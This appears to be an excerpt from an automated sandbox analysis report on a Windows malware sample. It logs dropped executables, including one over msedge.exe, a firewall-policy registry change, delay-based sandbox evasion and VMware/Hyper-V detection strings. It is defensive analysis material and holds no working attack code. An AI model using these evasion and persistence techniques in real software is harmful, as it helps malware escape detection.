        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File created: C:\Users\user\AppData\Local\Temp\winxmkqo.exe
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File created: C:\lwkdr.exe
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File created: C:\Users\user\AppData\Local\Temp\YMZwp.exe
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile

        Hooking and other Techniques for Hiding and Protection

        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: KeServiceDescriptorTable
        Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 799
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_004292C0 IsWindow,IsIconic,SetActiveWindow,IsWindow,IsWindow,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,SetParent,SetWindowPos,IsWindow,SendMessageA,SendMessageA,DestroyAcceleratorTable,IsWindow,IsWindow,IsWindow,IsWindow,IsWindow,GetParent,GetFocus,IsWindow,SendMessageA,IsWindow,GetFocus,SetFocus,6_2_004292C0
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_0042E740 DestroyCursor,IsWindowVisible,IsIconic,IsZoomed,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMenu,DeleteMenu,GetSystemMenu,6_2_0042E740
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_00432B10 IsIconic,IsZoomed,LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,SystemParametersInfoA,IsWindow,ShowWindow,6_2_00432B10
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_004A9CB0 IsIconic,GetWindowPlacement,GetWindowRect,6_2_004A9CB0
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_0042EE10 IsIconic,6_2_0042EE10
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: SearchApp.exe, 0000001F.00000000.1628661108.000001D6328A7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE
        Source: SearchApp.exe, 0000001F.00000000.1628661108.000001D6328A7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE{6D809377-6AF0-444B-8957-A3773F02200E}\UNITY\EDITOR\UNITY.EXE
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Thread delayed: delay time: 180000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Thread delayed: delay time: 300000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Thread delayed: delay time: 360000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Thread delayed: delay time: 2100000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Thread delayed: delay time: 2400000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Thread delayed: delay time: 900000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Thread delayed: delay time: 600000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Window / User API: threadDelayed 1401
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Window / User API: threadDelayed 4895
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Window / User API: foregroundWindowGot 573
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Window / User API: foregroundWindowGot 575
        Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 883
        Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 869
        Source: C:\Windows\SysWOW64\cscript.exe Window / User API: threadDelayed 9994
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winxmkqo.exe
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Dropped PE file which has not been started: C:\lwkdr.exe
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_9-1049
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_6-41841
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7304 Thread sleep time: -717312s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7376 Thread sleep time: -120000s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7384 Thread sleep time: -180000s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7408 Thread sleep time: -300000s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7624 Thread sleep time: -440000s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7400 Thread sleep time: -80000s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7608 Thread sleep time: -220000s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7608 Thread sleep time: -49000s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7612 Thread sleep time: -240000s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7612 Thread sleep time: -360000s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7384 Thread sleep time: -18900000s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7408 Thread sleep time: -31200000s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7380 Thread sleep time: -1800000s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7388 Thread sleep time: -600000s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7372 Thread sleep time: -194560s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7632 Thread sleep time: -210000s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7304 Thread sleep time: -2506240s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 1624 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 2000 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\cscript.exe TID: 1072 Thread sleep count: 9994 > 30
        Source: C:\Windows\SysWOW64\cscript.exe TID: 1072 Thread sleep time: -99940000s >= -30000s
        Source: C:\Windows\SysWOW64\cscript.exe TID: 1912Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\cscript.exe TID: 3276Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\dllhost.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeCode function: 9_2_00B31718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00B31754h9_2_00B31718
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0042B020 FindNextFileA,FindClose,FindFirstFileA,FindClose,6_2_0042B020
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0041D290 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA,6_2_0041D290
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_00433500 FindFirstFileA,FindClose,6_2_00433500
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004BCF09 __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy,6_2_004BCF09
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_024257A0 GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,Sleep,FindClose,Sleep,RtlExitUserThread,6_2_024257A0
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0242BADD Sleep,lstrcat,lstrcpy,CharLowerA,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,CharUpperA,lstrlen,lstrcmpiA,lstrcmpiA,lstrcpy,lstrlen,lstrcmpiA,FindClose,Sleep,6_2_0242BADD
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeCode function: 9_2_00B329E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,9_2_00B329E2
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeCode function: 9_2_00B32B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,9_2_00B32B8C
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 120000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 360000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 2100000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 2400000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
        Source: SearchApp.exe, 0000001F.00000000.1590741576.000001D62DB50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dx0ma3d6fxrucbibtqempqemuae&or=w
        Source: Amcache.hve.9.drBinary or memory string: VMware
        Source: SearchApp.exe, 0000001F.00000000.1537840813.000001CE1899C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: /rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: SearchApp.exe, 0000001F.00000000.1562195978.000001D61B740000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: hyper-v
        Source: SearchApp.exe, 0000001F.00000000.1632268032.000001D633570000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\VpxClient.exe8601749+
        Source: SearchApp.exe, 0000001F.00000000.1632187010.000001D633567000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: KasperskyLab.Kis.UI.Toasts8700VMware.Workstation.vmuite
        Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: SearchApp.exe, 0000001F.00000000.1632268032.000001D633570000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\VpxClient.exe
        Source: SearchApp.exe, 0000001F.00000000.1555939936.000001D61A6EA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wes
        Source: explorer.exe, 0000001B.00000000.1479087951.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.4124666902.0000000008796000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
        Source: SearchApp.exe, 0000001F.00000000.1560794643.000001D61AF87000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1589994067.000001D62DAD9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: s://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmp, YMZwp.exe, 00000009.00000003.1305108589.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, YMZwp.exe, 00000009.00000003.1305339645.0000000000C6A000.00000004.00000020.00020000.00000000.sdmp, YMZwp.exe, 00000009.00000002.1358038153.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, YMZwp.exe, 00000009.00000002.1358038153.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, YMZwp.exe, 00000009.00000003.1304793378.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1455737868.000001F0FDD84000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1479087951.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.4124666902.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: explorer.exe, 0000001B.00000003.2291978153.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: svchost.exe, 00000017.00000000.1450927769.000001697A6A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;False]
        Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: SearchApp.exe, 0000001F.00000000.1562195978.000001D61B740000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: hyper-vOs and f
        Source: SearchApp.exe, 0000001F.00000000.1632225446.000001D63356A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.View.Client
        Source: explorer.exe, 0000001B.00000003.2291978153.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
        Source: Amcache.hve.9.drBinary or memory string: vmci.sys
        Source: explorer.exe, 0000001B.00000000.1479087951.0000000008979000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00`
        Source: SearchApp.exe, 0000001F.00000000.1555743519.000001D61A667000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Downloading data https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w...
        Source: SearchApp.exe, 0000001F.00000000.1554109630.000001D61A492000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: neroonenotevmwareitunes
        Source: SearchApp.exe, 0000001F.00000000.1628520671.000001D632875000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe
        Source: Amcache.hve.9.drBinary or memory string: VMware20,1
        Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: SearchApp.exe, 0000001F.00000000.1628437057.000001D63285E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Polaris Office\Office8\Binary\PolarisOffice.exe
        Source: explorer.exe, 0000001B.00000000.1468114321.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
        Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: SearchApp.exe, 0000001F.00000000.1559347123.000001D61AD95000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: explorer.exe, 0000001B.00000003.2291978153.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
        Source: SearchApp.exe, 0000001F.00000000.1555939936.000001D61A6EA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: lhttps://www.bing.com/AS/API/WindowsCortanaPane/V2/InitFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: SearchApp.exe, 0000001F.00000000.1632187010.000001D633567000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Horizon.Client
        Source: SearchApp.exe, 0000001F.00000000.1632187010.000001D633567000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmplayercom.streamlabs.slobsna
        Source: explorer.exe, 0000001B.00000003.2291978153.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: RuntimeBroker.exe, 00000021.00000000.1653243216.00000269F9A4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: SearchApp.exe, 0000001F.00000000.1628520671.000001D632875000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe0
        Source: dwm.exe, 0000000E.00000000.1305778078.00000283DDE43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&0000007R
        Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
        Source: explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
        Source: explorer.exe, 0000001B.00000000.1479087951.000000000888E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
        Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
        Source: SearchApp.exe, 0000001F.00000000.1555939936.000001D61A6EA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
